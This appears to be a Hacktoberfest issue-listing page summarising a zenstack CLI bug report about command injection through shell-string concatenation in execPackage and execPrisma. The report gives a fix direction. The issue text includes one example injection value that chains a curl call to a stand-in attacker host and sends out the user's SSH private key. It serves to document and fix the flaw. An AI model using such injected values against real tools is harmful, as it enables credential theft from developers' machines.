Hacktoberfest 2026: the issues maintainers tagged for October, open and beginner-friendly. Browse Hacktoberfest issues

fix(cli): command injection via unsanitized string concatenation in execpackage and execprisma

Open
#2,738 1 comment 0 reactions 0 assignees View on GitHub

Maintainers usually reply within 1 day

Nobody has claimed this yet.

  • #2739 by @kumburovicbranko682-boop — closed without merging

Assessment

Difficulty
3/5
Estimated time
Half a day
Newbie friendliness
42/100
Issue type
Bug
Clarity
Clearly specified
Activity status
Quiet
Tech stack
node.js, typescript
Domain
cli, security

Research direction

Start at packages/cli/src/utils/exec-utils.ts and read execPackage and execPrisma, noting every value concatenated into the shell string and which callers supply it (CLI args, config, Prisma schema names). The fix is to stop using shell mode — e.g. execFileSync with an argument array — and to update each call site accordingly, then run the CLI package tests. PR #2739 was closed unmerged, so read it first for prior context and why it was rejected before starting.

Written by the indexing model from the issue text.

Description

Description

execPackage and execPrisma build shell commands by concatenating strings and pass them to child_process.execSync (shell mode). If any caller passes user-influenced input (e.g., package names or prisma CLI args derived from CLI arguments, config files, or schema names), an attacker can inject arbitrary shell commands. For example, a crafted package name like "legit; curl attacker.com/exfil?d=$(cat ~/.ssh/id_rsa)" would execute the injected command. This is a library with downstream consumers, so the blast radius extends to all consumers who don't sanitize before calling these. The execPrisma path is particularly concerning since it's called with args that may originate from user-provided Prisma schema or CLI flags.

Severity: high
File: packages/cli/src/utils/exec-utils.ts

Expected Behavior

The code should handle this case properly to avoid unexpected errors or degraded quality.

Dominant language
TypeScript
Stars
2.9k
Forks
157
Avg merge
11h 42m
Merged PRs (30d)
20

Getting set up

This project ships no dev container, Dockerfile or contributing guide, so setting up is up to you: start from its README, and see our first-contribution guide for the general steps.

First steps

  1. Read the whole issue, then the project's contributing guide.
  2. Comment on the issue to say you are picking it up — it saves two people doing the same work.
  3. Fork the repository and make your change on a branch.
  4. Open a pull request that references the issue number.

More from zenstackhq/zenstack

All issues in zenstackhq/zenstack

Similar issues

More TypeScript issues

Get new issues in your inbox

A short digest of beginner-friendly GitHub issues.